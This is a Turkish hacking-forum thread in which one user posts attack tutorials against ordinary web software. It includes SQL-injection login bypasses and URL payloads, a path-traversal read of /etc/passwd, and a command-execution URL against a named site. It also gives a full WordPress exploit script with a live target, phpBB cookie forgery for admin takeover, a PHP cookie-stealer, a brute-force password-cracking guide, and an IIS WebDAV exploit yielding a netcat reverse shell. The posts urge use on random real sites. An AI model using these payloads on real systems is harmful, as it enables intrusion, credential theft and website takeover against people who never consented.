Döküman ve Tutorial Havuzu...

OuTLaWsys · 03-04-2006, 20:48

Herkese Merhabalar.
Artık Bu Başlık Altında Bundan Önce ve Sonra Yayınlayacağımız Dökümanlar olacak.
Bazıları geçerliliğini kaybetmiştir.Bunları buraya koyup koymamak arasında tereddüt ettik ama olayların nasıl işlediğini görmeniz açısından buraya koymayı uygun gördük.

Bundan Sonra Yeni Dökümanlar ve Tutorialleri de burdan vereceğim yeni bir konu açıp forumu kirletmiyeceğim.Gelişmeleri Burdan Takip edebilirsiniz...
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014

İlk Döküman Access Diver ile Adult Hacking

Bu dökümanda Access Diver Programının nasıl kullanıldıgı anlatılmaktadır.Program sayesinde adult sitelerin passlerini kırabilirsiniz.Yanlız döküman access diver 4.92 versiyonuna göre anlatıldıgından biraz eski kalabilir.Ama şu an son versiyonun da ayarları aynı şekilde yapılmaktadır.İstediğiniz versiyonu indirmek için www.accessdiver.com sitesine gidebilirsiniz.Ve bu iş için en önemli şey combo wordlisttir.Size tavsiyem kendi güncel sağlam wordlistler deneyin.Kendi wordlistinizi kendiniz de oluşturabilirsiniz.Aksi taktirde buldugunuz şifreler fake olacaktır ve sitelere giriş yapamayacaksınızdır.Haydi Kolay gelsin

================================================== =====================
İlk önce size ad hakkında biraz bilgi vereyim ad (acces diver) bu program deneme yanılma yöntemiyle siteleri dener ve şifre bulur
Geçelim bu programı nasıl kullanıcaz ilk önce http://www.accessdiver.com/download/ad4.92.exe
adresinden acces diverı indirin ve kurun ondan sonra ayarlara geçelim ad yi açtığınızda yukarda my skill yazısı var ordan expert i seçiyoruz sonra sonra setting e bastığımız ilk yerde sağ tarafta stopping a security test after var onun altında never stop ve search in yor history also var ikisinide tickleyin ve artık settingin yanındaki proxy e gelelim proxy e girdiğimizde en başta use WEB proxies tickleyelim sonra allta rotate proxies vartickledikten sonra yanındaki sayıyı 2 yapalım sonra onun altındaki proxy skipping kısmıdan ilk üçünü tickleyin bulacağımız proxyler sitenin sizin ipnizi banlamaması için binevi sizi korur ondan sonra sıra geldi proxyleri bulmaya http://www.deny.de/phpbb2/ adresine üye olduktan sonra proxy dump kısmından proxy e grin ve orda yüzlerce kaliteli proxyler bula bilirsiniz
burdan bulduğunuz proxyleri bir metin belgesinin içine kaydedin şimdi sıra bu proxyleri test etmeye geldi yukardaki my listin yanındaki proxy analyzer girin ordan kaydetiğiniz proxyleri açın ve speed/accuracy tester a basmadan önce bir kaç ayar yapacaz ilki aşağıdaki 5 kutunun 1,2 ve 4 üncüsünü tickleyin ondan sonra speed/accuracy tester basın birkaç dakikadan sonra çalışmayan proxyler ayıklanmış olacak ama işimiz bitmedi speed/accuracy tester ın yanındaki confidentiality ye tıklayın birkaç dakka sonra bu işlemde bitmiş olacak bittikden sonra ticklediğimiz kutuların yanındaki proxyjudge ye tıklıyoruz ordan level yazısının altındaki 1 den 5 e kadar olanlardan 5,4,3 ü tickliyoruz ve del e basıyoruz ondan sonra bu sağlam proxyleri yukardanki icon a basarak bu proxyleri kaydediyoruz sonra tekrar my liste geçerek sağ tarafdaki dosya açma işine yarayan icona basıyoruz ve kaydettiğimiz sağlam proxy dosyasını açıp en baştakine bi kere basıp seçiyoruz şimdi sıra combo liste geldi combo listi de açtıkdan sonrayukardaki server yazan sarı yere kıracağımız adresin members lı urls ini oraya yazıp sol tarafdaki standart butonuna bastıkdan sonra ad işleme başlıyarak şifre bulmaya çalışıyor işte bu program bu kadar bişe yukarda vermiş olduğum ayarlar benim kullandığım ayarlardır unutmadan bor hzınız en bağlantı hıza göre değişir ben 56K modemle 75 kullanıyorum
================================================== ===============================
Döküman Alıntıdır.

OuTLaWsys · 03-04-2006, 20:50

##############StoreFront SQL Injection###########
Versiyon:6.0 ve aşağısı
Written By OuTLaWsys

Açık sadece yapacağınız çok birşey yok aslında ama paylaşmak istedim buyrun
1-) herhangi bir arama motoruna gidioruz (Google vb.)
2-)Storefront+login.asp ya da başka kombinasyonlar uygulayıp storefront login url sine ulaşıoruz.
3-)www.hedef.com/login.asp yada benzeri bir login.asp ye ulaşıoruz.

4-) login : example@example.com
passwd : ' or 'a'='a
YAZIP ENTERLIORUZ
5-) bu sayede ilk üye olan kişinin hesabına girmiş bulunuoruz.burda kişisel bilgiler falan bulunuor. mesela bu kişinin diğer email adresini falan biliorsanız gidip bu bilgilerle şifreyi alabilirsiniz ya da başka şeyler yapabilirsiniz bu size kalmış.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014
Eğer farklı bişey bulursanız sizde paylaşın

Döküman OuTLaWsys Tarafından Yazılmıştır.

OuTLaWsys · 03-04-2006, 20:51

#############Oscommerce 2.2 Bug###############
Document Written by OuTLaWsys

1-)Bir arama motoruna gidioruz(google ya da vb )
2-)admin/file_manager.php die arattırıoruz.
3-) çıkan sitelerden şu url ye gittiğimizde
www.site.com/admin/file_manager.php
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014
bir de ne görüoruz File Manager :=)
4-)sonra şu şekilde
http://www.hedef.com/admin/file_mana.../../etc/passwd yapıp şifreleri de alabiliriz.
Değişik kombinasyonlar yapmak elinizde ne de olsa File manager karşınızda hade kolay gelsin

Döküman OuTLaWsys Tarafından Yazılmıştır.İZİNSİZ KOPYALAMAK YASAKTIR.

OuTLaWsys · 03-04-2006, 20:52

##############Phorum 5.*###########
Document written by OuTLaWsys
Phorum 5.x lerde işe yarayan bu açık ile admin username ve pass ini görebilirsiniz (pass md5 hashlidir.Bunun hakkında bilgi için forumdaki md5 başlıklı konulara bakabilirsiniz.)

http://www.hedef.com/phorum5012/foll...1%2c1%2c1%2cCO NCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c 1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%2 0phorum_users%20WHERE%20admin=1
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014

Bunu bilgi amaçlı buraya yazdm.Abuk sabuk eleştirelerinzle başlığı kirletmeyelim!

By OuTLaWsys IZINSIZ KOPYALAMAYINIZ

OuTLaWsys · 03-04-2006, 20:55

########Document Written by OuTLaWsys###########
ASP Nuke versiyon 0.80 ile hazırlanmış sayfalardaki comment_post.asp dosyasındaki hatadan dolayı admin username ini ve passwordunun sha256 hashli halini alablirsiniz.
Adres çubugunda site adresinin sonuna ekleyeceğimiz bi kaç şey ile username ini ver pass i alabilrsiniz.
Örnek:
Username için:
http://www.hedefsite.com/module/supp...askID=Username
Password sha256 hashi için
http://www.hedefsite.com/modules/sup...askID=Password

(sha256 hashi kırıp kırmamak size kalmıştır.İlla her yeri hackliyip index atcaksınız die bir kaide yoktur.Açık açıktır

)

OuTLaWsys · 03-04-2006, 20:59

WEBHINTS COMMAND EXECUTION

Webhints scriptlerde ki açık ile uzaktan komut çalıştırabilioruz.Bu açık v1.3 ve altında çalışıor.İşleyişi ise şu şekilde.
www.site.com/cgi-bin/hints.pl?|KOMUT|
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014
ya da www.site.com/hints.pl?|KOMUT|
bakın bi tanede açığın oldugu site örnek olsun
http://www.johnsesl.com/cgi-bin/hints.pl?|uname|

Burda Komutlardan Kasıt .nix Komutlarıdır

OuTLaWsys · 03-04-2006, 21:00

WordPress 1.5.1.1 SQL INJECTION

#################WordPress 1.5.1.1#####################
Document Written by OuTLaWsys
Gerekli olanlar
1-)Active Perl
2-)Exploit

Bu exploit sayesinde Wordpress 1.5.1.1 versiyon kullanan sitenin adminin username ini password nü (md5 hashli) alabiliriz.Md5 hash i kırıp kırmamaya kalkışmak size kalmıştır ben sadece açığı ve nasıl kullanılacağını anlatıyorum.
Bilgisayarımıza active perli kurduğumuzu varsayarak işimize başlıyoruz.Yazının sonundaki perl code unu kopyalayıp text dosyasına yapıştırın ve farklı kaydet seçeneğini kullanarak dosyaadı bölümüne wordpress.pl yazıp dosyayı perl/bin klasörününzün altına .pl uzantılı olarak kaydedin(C:/perl/bin/ altına)

Bundan sonra wordpress 1.5.1.1 versiyon kullanan bir site buldunuz diyelim.
Başlat->Çalıştır->Command yazıp.DOs a geçioruz. burdan perl/bin klasörüne gidioruz.Sonra yapacağımız iş ise çok basit.
perl wordpress.pl http://www.site.com/wordpress/ (burda wordpress klasörünün ismi sitede başka olabilir)
Sonra bekliyoruz Şu şekilde bir sonuç alırsak iş tamamdır.

[+] Connected to: http://www.xxx.com/wordpress/
[+] Username of administrator is: admin
[+] MD5 hash of password is: 24258dfb50611325c4a689ca3574dac1

Size bir de örnek site buyrun üzerinde deneyin arkadaşlar.
http://www.themirrorpool.com/wordpress/

Exploit code ları da aşağıda.Haydi kolay gelsin.(md5 hashlerini kırmak için en ii yol şu ana göre rainbow table lardır ama genede beyniniz bulanabilir )

#!/usr/bin/perl -w
#
# SQL Injection Exploit for WordPress <= 1.5.1.1
# This exploit show the username of the administrator of the blog and his password crypted in MD5
# Related advisory: http://www.securityfocus.com/archive.../30/0/threaded
# Patch: Download the last version at http://wordpress.org/download/
# Coded by Alberto Trivero

use LWP::Simple;

print "\n\t======================================\n" ;
print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
print "\t= Alberto Trivero - codebug.org =\n";
print "\t======================================\n\n" ;

if(!$ARGV[0] or !($ARGV[0]=~m/http/)) {
print "Usage:\nperl $0 [full_target_path]\n\n";
print "Examples:\nperl $0 http://www.example.com/wordpress/\n";
exit(0);
}

$page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_l ogi n%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<title>.*?» (.*?)<\/title>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1);
$page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_p ass %20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!";
$page=~m/<title>.*?» (.*?)<\/title>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014

# milw0rm.com [2005-06-07]

OuTLaWsys · 03-04-2006, 21:03

##################Document Written by OuTLaWsys##########################
Dökümanın tarafımdan yazıldığını belirterek her şekilde yayınlayabilirsiniz.
Bu yazıda olayın mantıgı ayrıntılı bir biçimde anlatılmıştır.Bu döküman sayesinde bir zamanlar bir çok kişi phpBB forumlarında admin seviyesine ulaşıp forumları hacklemiştir.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014

1-)Her şeyden önce admin in md5 hashini aldığınızı varsayarak işe başlıyoruz. Bu döküman için admin md5 hashi 80e623f2e3ce5e440e7d69ddbdfbb2a2 olsun. (md5 hashini forumun versiyonuna göre SQL injection ya da başka yöntemlerle alınır.Burda admin hashinin nasıl alındığından değilde cookie ile oyanayıp nasıl admin seviyesine ulaşacağımız anlatılmaktadır.)
2-)Hackliyceğimiz kişinin(adminin) user id sini bilmemiz gerekiyor.Bunun için forumdaki memberlist bölümünden admin için viewprofile dediğimiz zaman browserda şu şekilde bir url yazar.Bu döküman için adminin user id si 3 olsun.
http://hedef/phpbb/profile.php?mode=viewprofile&u=3
İşte burda sondaki "3" kullanıcın user id sidir.
3-)Cookie editliyceğimiz için ya bir Cookie editor yada Firefox Browser kullanın.IE da cookie editlenmesi engellenmiştir.

Benim kendi PC imde cookieler burda saklanıyor.
C:\WINDOWS\Application Data\Mozilla\Firefox\Profiles\default.rgv\cookies. txt

Şimdi ilk olarak foruma gidip bir hesap açtırıyoruz kendimize.Sonra login olmak için username ve passwordumuzu giriyoruz ve "remember me" yada buna benzer olan her siteye girdiğinzde sizi tanımasını sağlıycak kutucugun yanına işaretimizi koyup login oluyoruz.Şimdi loginn olduk logout olmadan pencereyi kapatıyoruz yanlız kesinlikle logout olmak yok.
Şimdi gidip cookies.txt dosyamızı açıyoruz.Burada hedef sitemiz ile ilgili olan bölümü buluyoruz.Eğer bulmakta zorluk çekiyorsanız Mozilla cookie editor ile bütün cookieleri silip bir daha deneyin.Şimdi gerekli bölümü bulduk.

www.hedef.com FALSE / FALSE 1114433252 phpbb2mysql_data
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 2260cfdede09a57a46e90111c95bf2885c%22%3Bs%3A6%3A%2 2userid%22%3Bs%3A1%3A%224%22%3B%7D

Şimdi haklı olarak burdan birşey anlamıyorsunuz.Bakıyorsunuz sadece şimdi biraz inceleyelim.Burdaki % li değerlerin anlamlarına gelince.
%3A------->:
%7B------->{
%22------->"

Bakın ne çıkıyor bunu decode edince.
a:2:{s:11:"autologinid";s:32:"60cfdede09a57a46e901 11c95bf2885c";s:6:"userid";s:1:"4";}
şimdi burda bizim ile gerekli olan 2 şey var.
1-)60cfdede09a57a46e90111c95bf2885c işte bu sizin şifrenizin md5 algoritması ile kriptolanmış hali.
2-)";s:6:"userid";s:1:"4";} burdaki sondaki 4 de sizin user id niz.

şimdi adminin md5 hashi ile user id sini hatırlayalım
md5 hash:80e623f2e3ce5e440e7d69ddbdfbb2a2
user id:3

Ewet şimdi cookies.txt dosyamızı notepad ile açıp editliyoruz.

Bu ilk bizim olan cookie
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 2260cfdede09a57a46e90111c95bf2885c%22%3Bs%3A6%3A%2 2userid%22%3Bs%3A1%3A%224%22%3B%7D
Bu editlediğimiz hali ile cookie
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 2280e623f2e3ce5e440e7d69ddbdfbb2a2%22%3Bs%3A6%3A%2 2userid%22%3Bs%3A1%3A%223%22%3B%7D

Eğer bu iki string i incelerseniz.Nerelerin Değiştirilmiş oldugunu rahatlıkla anlarsınız.
Sonra bu cookies.txt dosyamızı kaydedip.Mozilla ile siteye gidiyoruz.Eğer hata yapmamışsak Hop bir bakıyoruz admin olarak login olmuşuz siteye.

#Document Written by OuTLaWsys#

OuTLaWsys · 03-04-2006, 21:05

phpBB 2.0.16 versiyodaki XSS (cross site scripting) açığından dolayı cookie bilgilerini çalmak mümkün.Bununla ilgili hazırladığım bir tutorial.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014
Herkese kolay gelsin
http://rapidshare.de/files/3573814/phpbb2.0.16.rar.html

Videoda Gözüken Cookie Stealer Kodları
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?>

OuTLaWsys · 03-04-2006, 21:08

SHELL ACCOUNT :

Shell Account.

Dikkat bu sayfadaki yazılar Turkish Scene 5. sayıdan alınmıştır.

Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014
SAYFADA YAZILAN HER SEY HELLRAZOR A AITTIR LTF YAZILARI DEGISTIRMEYINIZ
------------------------------------------------------------------------
''BOLUMLER''
1- SHELL ACC NEDIR?
2- BENİM ISP IM SHELL ACC VERIYOR MU?
3- SHELL ACC KONTROLU
4- SHELL INIZIN TIPI
5- SHELL TIPLERI
6- SHELL ACC VEREN BEDAVA VE PARALI YERLER -YERLI YABANCI
7- SHELL SINIFLANDIRILMASI
8- SON OLARAK SHELL
------------------------------------------------------------------------

1 SHELL ACCOUNT NEDIR???

SHELL ACC GENEL ANLAMINDA EVINIZDEKI BILGISAYARDA UNIX KOMANDLARINI
KULLANMANIZI SAGLAR .BU SAYADE UNIX KURULU BIR SISTEMDE CALISMIYOR
SANIZ YA DA DAHA ONCE HIÇ UNIX KULLANMAMISSANIZ ALICAGINIZ ACC ILE
WIN UZERINDEN UNIX KULLANMA FIRSATI YARATICAKSINIZ...

*NOT:ELLE DERGISININ İLK SAYISINDA HACKERLARLA ILGILI BIR YAZI OLDUGUNU
OGRENDIM.DERGIDE TAKMA ISMINI BILE VERMEK ISTEMIYEN BU ARKADASIN
SOYLEMIS OLDUGU KONUMUZLA ILGISI OLAN SEYI AYNEN YAZIYORUM
------------------------------------------------------------------
ELLE:Turkıyede hack ve crack olayları ıle ugrasan ınsanlar varmı?

DATCRACK:Cok var hackıng ınsanların ılgısını cekıyor.Sırf hackıng
yapabılmek ıcın evınde wındows sıstemınden UNIX sıstemıne gecıyor
------------------------------------------------------------------
SIMDI BURADA NE VAR??

BU CUMLEYE DIKKAT!'evınde wındows sıstemınden UNIX sıstemıne gecıyor'

UNIX SISTEMI ÇOK KUVETTLI KONFIGURASYON ISTEYEN BIR SISTEMDIR
AYRICA EV KULLANICILARI ICIN COK PAHALI BIR SISTEMDIR

ARTIK SHELL IN NE OLDUGUNU VE NEYE YARADIGINI ANLADINIZ

///////////////////////////////////////////////////////////////////////
2- BENIM ISP IM SHELL ACC VERIYORMU?

BU KONUDA TURKIYEDE ARAMADIGIM ISP KALMADI.ARADIKLARIMIN %80 NE OLDU
GUNU BILMEDIKLERINI %20 SI ISE VERMEDIKLERINI SOYLEDI
BILENLERDEN 2 TANESI BENIM NEDEN SHELL ACC ISTEDIGIMI NE ISLE UGRASTIGI
MI FILAN SORDU ) TAVSIYE HICBIRINI ARAMAYIN
AMA YINEDE SHELL ACC KONTROLU YAPALIM
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014

///////////////////////////////////////////////////////////////////////

3- SHELL ACC KONTROLU

SISTEMIMIZDE BIR ACC VARMI? BUNUN CEVABINI ANCAK KONTROLEDEREK SOYLERIZ
ADINI VERMIYECEGIM BIR ISS (YERLI) 2 SENE ONCEKADAR SHELL ACC VERIYORDU
TABI UYELERI BU GUNE KADAR KONTROL ETMEDIGI ICIN HIC KIMSE FARKINA
VARMADI

KESINLIKLE ISS IN SIZE SHELL VERICEGINI SANMAYIN NORMALDE SIZIN ONU ACTIR
MANIZ LAZIM O DA 10 $ CIVARINDA OLMALI(TABI ARTIK ISS LER SHELL VERMIYOR)
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014

SISTEMDEKI SHELL KONTROLU ICIN
WIN ICINDE BULUNAN TELNET I ACIN , NASIL MI?

BASLAT(START) MENUSU BUL(FIND) DOSYALAR VE KLASORLER E GELIN SABIT
DISKTE TELNET DIYE ARATIN

1 ADIM TELNETI ACIN UC BIRIM YADA TERMINAL OZELLIKLERINDEN YAZI TIPINI
BIRAZ KUCULTUN

2 ADIM BAGLAN SONRADA UZAKTAKI SISTEM YA DA CONNECT VE REMOTE SISTEM E BASIN

3 KARSINIZA BI KUTU CIKACAK
HOST NAME:BU KISMA ISSIN SIZE VERDIGI EMAIL ADRESININ (ABUZER@XXX.COM)
XXX.COM OLAN BOLUMUNU YAZIN
BAGLANTI NOKTASI YA DA PORT DA TELNET KALSIN
UCBIRIMTURU DE VT100 OLUCAK

BUNDAN SONRA CONNECT E BASIN EGER KARSINIZA BIR MENU CIKARSA LOGIN
FILAN SORARSA BU SHELLINIZ VAR DEMEKTIR

///////////////////////////////////////////////////////////////////////

4-SHELL ACC ININ TIPI

SHELL INIZIN NASIL OLDUGUNU BU KOMMANDI �ls
-alF� VERIP ANLIYACAGIZ

ls -alF
total 37
drwx--x--x 5 galfina user
1024 Apr 18 11:35 ./
drwxr-xr-x 380 root wheel 6656 Apr 18 18
:15 ../
-rw-r--r-- 1 galfina user 2793 Apr 18 111:16
BU GİBİ YAZILAR CIKARSA SIZIN SHELLINIZ GERCEKDEN II BIR SHELL DEMEKTIR

///////////////////////////////////////////////////////////////////////

5-DEGISIK SHELL ACC TIPLERI

ARTIK SHELL INIZI 1s -alF YI KULLANARAK ELINIZDE NE OLDUGUNU ANLADINIZ
SIMDI VERICEGINIZ KOMMAND ISE �echo $SHELL�(AYNISINI YAZIN)SIZE NE TUR
SHELLINIZ OLDUGUNU SOYLEYECEKTIR HER SHELLIN FARKLI AMACLARI VE KULLAN
IM YERLERI VARDIR.

�echo $SHELL� DEN SONRA CIKAN YAZILARDA :

/bin/bash İSE BASH shell INIZ VARDIR
/bin/sh İSE bourne shell INIZ VARDIR
/bin/ksh İSE KORN shell INIZ VARDIR
/bin/csh İSE C SHELL INIZ VARDIR
/bin/tcsh İSE TCSH SHELL INIZ VARDIR
/bin/zsh İSE Zsh SHELL INIZ VARDIR

YENI BASLAYANLAR ICIN BASH ILERISI ICIN C ONERILIR

*NOT echo $SHELL OLAMAZSA echo $shell İ DENEYİN

//////////////////////////////////////////////////////////////////////

6-SHELL ACC VEREN YERLI VE YABANCI YERLER

BEDAVA SHELL ACC KIMSE VERMEZ ANCAK DENEMELIK BIR SURE ICIN ALABILIRSINIZ
TABI PARA ILE SATAN YERLERDE VAR.....

TURKIYEDE 1 TEK BULABILDIGIM wwwentagraph.net ADRESİ 10 $A AÇILIS
10$ A 1 AYLIK SHELL VERIYORLAR VERDIKLERI SHELL TIPLERINI ORADAN
OGRENEBILIRSINIZ

YABANCI SITELER(BEDAVA)

www.unıxnet.org
www.freeshells.net
www.vexatıon.org
www.nyx.net

bu adreslerden www.nyx.net SIZI HEMEN SISTEME
BAGLIYORLAR ADRESLERI
BROWSER INIZA BU ADRESI YAZIN

telnet:/nyx.net/

////////////////////////////////////////////////////////////////////
7- SHELL LERIN SINIFLANDIRILMASI

SHELL
/ \
/ \
/ \
BOURNE C
/ | | \ / \
SH KSH Zsh BASH CSH TCSH

YUKARDAKI SINIFLANDIRILMADAN SONRA YAZACAGIMIZ SHELL SCRIPT ILE BOURNE
SHELLERI ,C SHELL ICIN YAZACAGIMIZ SCRIPT ILE DE C SHELL CALISTIRILIR

*NOT: IKI FARKLI SHELL SCRIPT I BIRBIRINE EKLEMEK
BOURNE SHELL LERI ''.'' KOMANDINI KULLANARAK
C SHELLERI ''source'' DIYE KULLANILARAK YAPILABILIR.......

///////////////////////////////////////////////////////////////////////

8 SHELLER ILE SON OLARAK

SANIRIM KAFANIZI KURCALIYAN BU SHELL KONUSU ARTIK SIZE DAHA KOLAY
GELMEKTEDIR.EGER SHELL E PARA VERMEK ISTEMIYORSANIZ DEDIGIM BEDAVA
ADRESLERDEN SHELL ALABILIRSINIZ

**BEDAVA SHELL ALDIGINDA YAPMANIZ GEREKENLER
LOGIN VE PASSWORD U NUZU KIMSEYE VERMEYIN
SİSTEMI IYICE ANLAMADAN HACK OLAYLARINA BASLAMAYIN
SISTEM YAVASLARSA PANIK YAPMAYIN
YAZDIKLARINIZA DIKKAT EDIN KULLANDIGINIZ BIR UNIX SISTEMI DOS
A BENZEMEZ

------------------------------------------

BEDAVA SHELL ACCOUNT VEREN YERLER :

Nyx
NYX firmasy email hizmeti, UNIX sistemi üzerinden Internet (ftp, telnet, www, vb.) hizemetleri
veriyor. Ayny zamanda 100K lyk bir web alanyda veriyor. Tabi ücretsiz

Havoc.net
Havox netten account alabilmek için satan@havoc.net adresine Ysminizin, kullanycy ady ve
?ifrenizin oldu?u bir mail atyn. Mail adresiniz do?ru ise mail adresinize bilgi gelecektir

Global Unix FreeNet
Web sitenize hostluk ya?yyorlar, UNIX tabanly IRC, C programlary derleme, CGI scriptleri
yazabilme, ve popüler mail, news reader gibi programlary kullanabilme. Katylym formu adreste...

Pooki.Smartec.Com
Formu doldurun ve shell accountunuz, IRC, home page vb. hizmetleriniz olsun

Nether Nets
Nether news FTP,Telnet,IRC, WWW (Lynx),News, home pages vb. için shell account sa?lyyor.
Kullanycy kayyt için Telnet gerekiyor.

HEAP
Bu ?irkette bedava shell account veriyor ama herhangi bir bilgim yok.

Bru-Noc
10 MB web alany tam bir CGI eri?imi, email account ve shell account. FTP, HTTP, shells, PERL,
C kodu derleme ve bazy Unix Araçlary. Bot yok...

DucTape
2MB alan verir, T1 ba?lanty, email, pop3, imap4, lynx, website için CGI, ve IRC eri?imi. paraly
accountlar için bot izni

Hobbiton
Bu tip i?lere hostluk yapyyor ama 24 saat de?il.. Email, lynx, C programy derleme, web site için
cgi, irc, BitchX, telnet, ftp, eggdrop...

CM
10 MBlyk T1 Ba?lantysy veriyorlar,i?letim sistemi Debian Linux, IRC botlaryna izin var.

Çoğu arkadaş shell account hakkında soru soruyordu.Bilgilerinize.
ALINTIDIR

OuTLaWsys · 03-04-2006, 21:13

XMLRPC Command Execution Exploiti Resimli Anlatımı

http://rapidshare.de/files/8446723/X..._305_.rar.html

OuTLaWsys · 03-04-2006, 21:15

Dökümanını yukarda yazdıgım açığın videosu

http://rapidshare.de/files/8446241/W...cking.rar.html

OuTLaWsys · 03-04-2006, 21:15

Video Linki Aşağıdadır.

http://rapidshare.de/files/8447196/S...ction.rar.html

OuTLaWsys · 03-04-2006, 21:16

PHPNEWS SQL Injection Video

http://rapidshare.de/files/8447943/P...ction.rar.html

OuTLaWsys · 04-04-2006, 10:55

############################DOCUMENT WRITTEN BY OUTLAWSYS#################

04/04/2006

Hacking IIS 5.0
Burada yazdıgımız yöntem WebdaV açığını kullanarak sisteme girmekten ibarettir.Dökümanı IZINSIZ KOPYALAMAYINIZ.

DavS açığını bir çok arkadaş sadece sayfaları deface etmek için kullanıp duruyor halbuki bu açığı çok daha etkin şekilde kullanmak mümkün.Bu metoddan daha önce kimse bahsetmemişti.Bende yazma gereği duydum.

1) Gerekli Programlar

1) xwbf-v0.3.exe (Webdav için Exploit)
2) PTwebdav.exe ** (Hedefin Vulnerable olup olmadıgını kontrol için)
3) A Scanner (IIS 5.0 Aramak için)
4) tftpd32.exe ** (tfpt server, dosya uploadı için)
5) Netcat (Port Listening işlemi için)

** olanlar opsiyoneldir.Programları aşağıdaki linkten download edebilirsiniz.AV Kullanan arkadaşlara söyliyorum.AV niz uyarı verebilir ama virus yada trojan olarak değil hacking tool olarak görmesinden kaynaklanır.Yani herhangi bir mesuliyet kabul etmiyorum.

http://rapidshare.de/files/17163349/Hacking.rar.html

2)Vulnerable IIS 5.0 Arama

Superscanner yada başka bir scanner ı çalıştırıp,herhangi bir ip aralıgını 80. i port için aratıyoruz.
Örneğin bir tane ip buldugunuzda IP adresini PTwebdav.exe progrmaına yapıştırıyoruz ve check butonuna tıklıyoruz.Program IP yi kontrol ediyor ve eger açık varsa "Vulnerable" diye size belirtiyor.Eger "Not Vulnerable " derse açık yok demektir başka IP deniyoruz.

3)Exploiting Webdav

Şimdi netcati açıp 666 nolu portu dinleyeceğiz(eger router arkası iseniz,port forwarding yapmanız gerekecektir)

Şimdi Port listening olayı için DOS a çıkacağız.
Bunun için başlata tıklayın,ordan çalıştıra tıklayın ve "cmd" yazıp enterlayın(tırnaklar yok)
Sonra netcatin bulundugu klasöre geçin ve netcatin klasöründe şu komutu yazın

nc -l -vv -p 666

Eger "Listening on any [666]" gibi bir mesaj alırsanız port listening işlemimiz tamamdır.

Şimdi xwbf-v0.3.exe ile sistemi exploitliycez.
"Satan's IP" yazan yere kendi ip nizi yazınız.
"Target " yazan yere hedef sitenin ip sini yazınız.
Geri kalan ayarlara dokunmayınız."Exploit" butonuna basınız.Şimdi program işini yapmaya çalışıyor

Checking ntdll.dll buffer overflow .....CONNECTED
send evil buffer ........ NOT VULNERABLE
If you see this, the target is vulnerable:

Gibir birşey çıkarsa sistem vulnerable değildir.

Checking ntdll.dll buffer overflow .....CONNECTED
send evil buffer ........ VULNERABLE
Connecting to [ip address] .........CONNECTED
trying ret addr 0x00d000d0 .........DONE
Waiting for IIS to restart .........CONNECTED
trying ret addr 0x00d100d1 .........DONE
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014

Gibi bir şey çıkarsa Açık mevcuttur.Artık yapmanız gereken beklemek.Bazen çok beklemeniz gerekebiliyor hatta o kadar beklemeye ragmen genede giremeyebiliyorsunuz sisteme nedeni ise meçhul.

Eger herşey tamamsa netcati açtıgımız DOS komut satırında hedef sistemin komut satırına düşmüşüzdür.

Burdan Sonra yapacaklarınız tamamen size aittir.örneğin tftpd ile sisteme dosya atıp örneğin server win2000 ise rootlayabilirsiniz.ya da başka şeyler yapmanız mümkün gerisi için de biraz araştırısınız bazı şeyler elde edersiniz.

#################DOCUMENT WRITTEN BY OuTLaWSyS###########################

03-04-2006, 20:48	#1
OuTLaWsys Banned Kayıt Tarihi: Jan 2005 Üye numarası: #1179 Mesaj sayısı: 1,062 Karma etkisi: 0 Karma: 10519	Döküman ve Tutorial Havuzu... Herkese Merhabalar. Artık Bu Başlık Altında Bundan Önce ve Sonra Yayınlayacağımız Dökümanlar olacak. Bazıları geçerliliğini kaybetmiştir.Bunları buraya koyup koymamak arasında tereddüt ettik ama olayların nasıl işlediğini görmeniz açısından buraya koymayı uygun gördük. Bundan Sonra Yeni Dökümanlar ve Tutorialleri de burdan vereceğim yeni bir konu açıp forumu kirletmiyeceğim.Gelişmeleri Burdan Takip edebilirsiniz... Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=54014 İlk Döküman Access Diver ile Adult Hacking Bu dökümanda Access Diver Programının nasıl kullanıldıgı anlatılmaktadır.Program sayesinde adult sitelerin passlerini kırabilirsiniz.Yanlız döküman access diver 4.92 versiyonuna göre anlatıldıgından biraz eski kalabilir.Ama şu an son versiyonun da ayarları aynı şekilde yapılmaktadır.İstediğiniz versiyonu indirmek için www.accessdiver.com sitesine gidebilirsiniz.Ve bu iş için en önemli şey combo wordlisttir.Size tavsiyem kendi güncel sağlam wordlistler deneyin.Kendi wordlistinizi kendiniz de oluşturabilirsiniz.Aksi taktirde buldugunuz şifreler fake olacaktır ve sitelere giriş yapamayacaksınızdır.Haydi Kolay gelsin ================================================== ===================== İlk önce size ad hakkında biraz bilgi vereyim ad (acces diver) bu program deneme yanılma yöntemiyle siteleri dener ve şifre 